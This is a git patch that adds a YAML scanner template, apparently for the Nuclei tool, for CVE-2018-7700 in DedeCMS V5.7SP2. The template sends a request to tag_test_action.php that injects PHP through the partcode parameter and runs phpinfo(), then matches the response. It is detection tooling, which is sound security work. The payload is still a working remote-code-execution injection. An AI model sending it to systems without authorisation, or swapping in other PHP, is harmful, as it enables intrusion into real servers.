From 70ea0f089bf18e2c5fbcf291c994cf43899f9a14 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Mon, 15 Mar 2021 08:15:21 +0000
Subject: [PATCH] Create CVE-2018-7700.yaml

---
 cves/2018/CVE-2018-7700.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cves/2018/CVE-2018-7700.yaml

diff --git a/cves/2018/CVE-2018-7700.yaml b/cves/2018/CVE-2018-7700.yaml
new file mode 100644
index 0000000000..de3d622d4c
--- /dev/null
+++ b/cves/2018/CVE-2018-7700.yaml
@@ -0,0 +1,27 @@
+id: CVE-2018-7700
+
+info:
+  name: DedeCMS V5.7SP2 RCE
+  author: pikpikcu
+  severity: high
+  reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/
+  tags: cve,cve2018,dedecms,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "phpinfo"
+          - "PHP Version"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200